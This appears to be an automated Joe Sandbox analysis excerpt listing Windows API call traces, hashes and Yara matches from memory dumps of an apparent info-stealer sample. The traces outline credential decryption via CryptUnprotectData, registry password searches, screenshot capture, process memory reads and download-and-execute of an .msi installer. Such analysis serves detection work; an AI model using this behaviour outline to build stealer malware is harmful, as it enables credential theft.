                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F206
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F215
                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F233
                                                      • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F261
                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F274
                                                      • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F286
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F292
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F2DF
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F31F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                      • String ID: ERROR
                                                      • API String ID: 2137491262-2861137601
                                                      • Opcode ID: e7680c11a91e8b6c3c8f82bef7fa201e94bd7553147c415b9cb206c114ce16cc
                                                      • Instruction ID: 9abe9f8fe7dca6ffdbab36a4153b7e44e04b96eb82d1d181ed6394daf58576c4
                                                      • Opcode Fuzzy Hash: e7680c11a91e8b6c3c8f82bef7fa201e94bd7553147c415b9cb206c114ce16cc
                                                      • Instruction Fuzzy Hash: FF51A235B101059FCB21AB39CD49AAB77A5AF94304F04517AFC0AEB391DF78DC468B98
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F42B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F459
                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02C8F46D
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8F47C
                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 02C8F49A
                                                      • StrStrA.SHLWAPI(00000000,?), ref: 02C8F4C8
                                                      • lstrlen.KERNEL32(?), ref: 02C8F4DB
                                                      • strtok.MSVCRT(00000001,?), ref: 02C8F4ED
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8F4F9
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 02C8F546
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 02C8F586
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                      • String ID: ERROR
                                                      • API String ID: 2137491262-2861137601
                                                      • Opcode ID: 2c89e48d0b9b0eda821c55660e72daf3842d776b43c941ecb21aeec7c28ff561
                                                      • Instruction ID: 415ec9f9a8a672f22d161015c0d33c8d60f250bf123c28e38491eb551c1ccc84
                                                      • Opcode Fuzzy Hash: 2c89e48d0b9b0eda821c55660e72daf3842d776b43c941ecb21aeec7c28ff561
                                                      • Instruction Fuzzy Hash: 5A51BE719006829FDB21BF38CC48AAE77E6EF94708F048518EC0ADBA10EB30DD41DB91
                                                      APIs
                                                      • GetEnvironmentVariableA.KERNEL32(02D8A5E0,00639BD8,0000FFFF), ref: 0040A026
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040A053
                                                      • lstrlenA.KERNEL32(00639BD8), ref: 0040A060
                                                      • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A08A
                                                      • lstrlenA.KERNEL32(00434C54), ref: 0040A095
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0B2
                                                      • lstrcatA.KERNEL32(00000000,00434C54), ref: 0040A0BE
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0E4
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0040A0EF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A114
                                                      • SetEnvironmentVariableA.KERNEL32(02D8A5E0,00000000), ref: 0040A12F
                                                      • LoadLibraryA.KERNEL32(02D8E400), ref: 0040A143
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2929475105-0
                                                      • Opcode ID: 4fbcdc3098aad57f1cd1783f116feb515df0f54c487ac4daf38f2631b6e3f110
                                                      • Instruction ID: 16528322d234b40cf1fb76c3db849273f78afb20369f5d4540fba7c57ad762d2
                                                      • Opcode Fuzzy Hash: 4fbcdc3098aad57f1cd1783f116feb515df0f54c487ac4daf38f2631b6e3f110
                                                      • Instruction Fuzzy Hash: 90919F306007009FD7219FA5DC88AA736A6AB94705F40507AF905AB3E1EFBDDD508BDA
                                                      APIs
                                                      • GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 02C7A28D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7A2BA
                                                      • lstrlen.KERNEL32(00639BD8), ref: 02C7A2C7
                                                      • lstrcpy.KERNEL32(00000000,00639BD8), ref: 02C7A2F1
                                                      • lstrlen.KERNEL32(00434C54), ref: 02C7A2FC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7A319
                                                      • lstrcat.KERNEL32(00000000,00434C54), ref: 02C7A325
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7A34B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C7A356
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7A37B
                                                      • SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 02C7A396
                                                      • LoadLibraryA.KERNEL32(00638D78), ref: 02C7A3AA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2929475105-0
                                                      • Opcode ID: 0649521484773df5a13b860f02ca4509e53c992252372a3c91847646a3c61d7e
                                                      • Instruction ID: 7d9bce7ac0982688abb3ec8e7133f8d606e68796a5c8402bc58c3d58f48e448c
                                                      • Opcode Fuzzy Hash: 0649521484773df5a13b860f02ca4509e53c992252372a3c91847646a3c61d7e
                                                      • Instruction Fuzzy Hash: D191B371600B018FD7309F69DC88EAA37B7EB98709F545428F805876A1EBB5DA84CFD1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040BC1F
                                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC52
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BC7C
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC84
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BCAC
                                                      • lstrlenA.KERNEL32(00434ADC), ref: 0040BD23
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 2500673778-0
                                                      • Opcode ID: 15e908f023ec14d2470523892675e38484664b3e87caaa26c26bfa6066537364
                                                      • Instruction ID: b199f1bc841aab2c8232b5e7ee7863f4fe3244599780bab2fc116af185a33c6c
                                                      • Opcode Fuzzy Hash: 15e908f023ec14d2470523892675e38484664b3e87caaa26c26bfa6066537364
                                                      • Instruction Fuzzy Hash: BAA14C30A012058FDB25DF69D949A9AB7B1EF44308F14807EE806A73E1DB79DC45CF98
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02C77A6C
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 02C77AB1
                                                      • strlen.MSVCRT ref: 02C77AE5
                                                      • StrStrA.SHLWAPI(?,00434ACC), ref: 02C77B1F
                                                      • strlen.MSVCRT ref: 02C77BB4
                                                        • Part of subcall function 02C779B7: GetProcessHeap.KERNEL32(00000008,00000400), ref: 02C779C5
                                                        • Part of subcall function 02C779B7: RtlAllocateHeap.NTDLL(00000000), ref: 02C779CC
                                                        • Part of subcall function 02C779B7: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02C779F4
                                                        • Part of subcall function 02C779B7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 02C77A14
                                                        • Part of subcall function 02C779B7: LocalFree.KERNEL32(?), ref: 02C77A1E
                                                      • strcpy_s.MSVCRT ref: 02C77B48
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77B53
                                                      • HeapFree.KERNEL32(00000000), ref: 02C77B5A
                                                      • strlen.MSVCRT ref: 02C77B67
                                                      • strcpy_s.MSVCRT ref: 02C77B91
                                                      • strlen.MSVCRT ref: 02C77BDB
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 02C77C9C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                                      • String ID:
                                                      • API String ID: 225686516-0
                                                      • Opcode ID: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction ID: 4f190347833fa3df61891f402d221eb47b666a4d53d76485429eee8af5a74bff
                                                      • Opcode Fuzzy Hash: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction Fuzzy Hash: 88810EB1D0021DAFDB10DF94DC84ADEBBB9EF48304F10416AE509E7250EB759A89CFA5
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 02C8EBB0
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8EBE6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8EBF4
                                                      • lstrcat.KERNEL32(?,00434F28), ref: 02C8EC0D
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 02C8EC74
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8ECA6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8ECB4
                                                      • lstrcat.KERNEL32(?,00434F48), ref: 02C8ECCD
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02C8ED38
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8ED67
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8ED75
                                                      • lstrcat.KERNEL32(?,00434F5C), ref: 02C8ED8E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00418313
                                                      • lstrlenA.KERNEL32(00000000,?), ref: 0041834C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00418383
                                                      • lstrlenA.KERNEL32(00000000), ref: 004183A0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004183D7
                                                      • lstrlenA.KERNEL32(00000000), ref: 004183F4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041842B
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418448
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00418477
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418491
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004184C0
                                                      • strtok_s.MSVCRT ref: 004184DA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      • API ID: lstrcpylstrlen$strtok_s
                                                      • String ID:
                                                      • API String ID: 2211830134-0
                                                      APIs
                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,?,00000000), ref: 02C92848
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C92883
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02C92894
                                                      • memset.MSVCRT ref: 02C928BC
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 02C92913
                                                      • lstrlen.KERNEL32(00000000), ref: 02C92920
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C929A7
                                                      • lstrlen.KERNEL32(00000000), ref: 02C929AE
                                                      • strlen.MSVCRT ref: 02C929D2
                                                      • memset.MSVCRT ref: 02C92A5C
                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02C92AA9
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: Processlstrcpylstrlenmemset$MemoryOpenReadstrlen
                                                      • String ID:
                                                      • API String ID: 311138045-0
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,02C91127), ref: 02C946ED
                                                      • GetDesktopWindow.USER32 ref: 02C946F7
                                                      • GetWindowRect.USER32(00000000,?), ref: 02C94704
                                                      • SelectObject.GDI32(00000000,00000000), ref: 02C94736
                                                      • GetHGlobalFromStream.COMBASE(02C91127,?), ref: 02C947AD
                                                      • GlobalLock.KERNEL32(?), ref: 02C947B7
                                                      • GlobalSize.KERNEL32(?), ref: 02C947C4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                                      • String ID:
                                                      • API String ID: 1264946473-0
                                                      APIs
                                                      • lstrcat.KERNEL32(?,00638B0C), ref: 02C8E454
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C8E47E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E4B6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8E4C4
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4DF
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4F3
                                                      • lstrcat.KERNEL32(?,00638A84), ref: 02C8E507
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E51B
                                                      • lstrcat.KERNEL32(?,00638AC8), ref: 02C8E52E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E566
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C8E56D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                                      • String ID:
                                                      • API String ID: 4230089145-0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406AFF
                                                      • InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 00406B2C
                                                      • StrCmpCA.SHLWAPI(?,02D8F9D0), ref: 00406B4A
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406B6A
                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406B88
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BA1
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406BC6
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BF0
                                                      • CloseHandle.KERNEL32(00000000), ref: 00406C10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406C17
                                                      • InternetCloseHandle.WININET(?), ref: 00406C21
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                      • String ID:
                                                      • API String ID: 2500263513-0
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(0043517C,?,02C8764B), ref: 02C94C5D
                                                      • GetProcAddress.KERNEL32(00000000,00435188), ref: 02C94C73
                                                      • GetProcAddress.KERNEL32(00000000,00435190), ref: 02C94C84
                                                      • GetProcAddress.KERNEL32(00000000,0043519C), ref: 02C94C95
                                                      • GetProcAddress.KERNEL32(00000000,004351A8), ref: 02C94CA6
                                                      • GetProcAddress.KERNEL32(00000000,004351B0), ref: 02C94CB7
                                                      • GetProcAddress.KERNEL32(00000000,004351BC), ref: 02C94CC8
                                                      • GetProcAddress.KERNEL32(00000000,004351C4), ref: 02C94CD9
                                                      • GetProcAddress.KERNEL32(00000000,004351CC), ref: 02C94CEA
                                                      • GetProcAddress.KERNEL32(00000000,004351DC), ref: 02C94CFB
                                                      • GetProcAddress.KERNEL32(00000000,004351E8), ref: 02C94D0C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2238633743-0
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8CB0C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8CB35
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 02C8CC28
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: lstrcpy$ExecuteShelllstrcatlstrlen
                                                      • String ID: /i "$ /passive$.msi$<$hKC$NC
                                                      • API String ID: 619169029-2209698126
                                                      APIs
                                                        • Part of subcall function 004077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                                                        • Part of subcall function 004077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                                                        • Part of subcall function 004077D0: strlen.MSVCRT ref: 0040787E
                                                        • Part of subcall function 004077D0: StrStrA.SHLWAPI(?,Password), ref: 004078B8
                                                        • Part of subcall function 004077D0: strcpy_s.MSVCRT ref: 004078E1
                                                        • Part of subcall function 004077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                                                        • Part of subcall function 004077D0: HeapFree.KERNEL32(00000000), ref: 004078F3
                                                        • Part of subcall function 004077D0: strlen.MSVCRT ref: 00407900
                                                      • lstrcatA.KERNEL32(00000000,00434ADC), ref: 00407A90
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00407ABD
                                                      • lstrcatA.KERNEL32(00000000, : ), ref: 00407ACF
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00407AF0
                                                      • wsprintfA.USER32 ref: 00407B10
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00407B39
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407B47
                                                      • lstrcatA.KERNEL32(00000000,00434ADC), ref: 00407B60
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                      • String ID: :
                                                      • API String ID: 2460923012-3653984579
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7BE86
                                                      • lstrlen.KERNEL32(00000000), ref: 02C7BEB9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7BEE3
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C7BEEB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7BF13
                                                      • lstrlen.KERNEL32(00434ADC), ref: 02C7BF8A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 2500673778-0
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00418044
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418071
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004180A0
                                                      • strtok_s.MSVCRT ref: 004180B1
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 004180E5
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418113
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418147
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      • API ID: strtok_s$lstrcpylstrlen
                                                      • String ID: FB
                                                      • API String ID: 348468850-3916161110
                                                      APIs
                                                      • __getptd.LIBCMT ref: 02C996F0
                                                        • Part of subcall function 02C98C76: __getptd_noexit.LIBCMT ref: 02C98C79
                                                        • Part of subcall function 02C98C76: __amsg_exit.LIBCMT ref: 02C98C86
                                                      • __amsg_exit.LIBCMT ref: 02C99710
                                                      • __lock.LIBCMT ref: 02C99720
                                                      • InterlockedDecrement.KERNEL32(?), ref: 02C9973D
                                                      • free.MSVCRT ref: 02C99750
                                                      • InterlockedIncrement.KERNEL32(XuC), ref: 02C99768
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                      • String ID: XuC$XuC
                                                      • API String ID: 634100517-965221565
                                                      • Opcode ID: 020f135a77a2bf4c8e551a451e6f34798df094e9785368ae935b27bc8f0fed19
                                                      • Instruction ID: 1416c2a835bc588488d4e5498ef80a52993a2fb2a79ddb1fa54d4671bb602751
                                                      • Opcode Fuzzy Hash: 020f135a77a2bf4c8e551a451e6f34798df094e9785368ae935b27bc8f0fed19
                                                      • Instruction Fuzzy Hash: 1E01B5B2D06B11EBDF31AF29984C75DB361BF44B10F050919E814A7290DF39AA41DFDA
                                                      APIs
                                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E04
                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409E42
                                                      • memset.MSVCRT ref: 00409E6F
                                                      • LocalAlloc.KERNEL32(00000040), ref: 00409EA7
                                                        • Part of subcall function 004273F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042740E
                                                      • lstrcpy.KERNEL32(00000000,00434C50), ref: 00409FB2
                                                      Strings
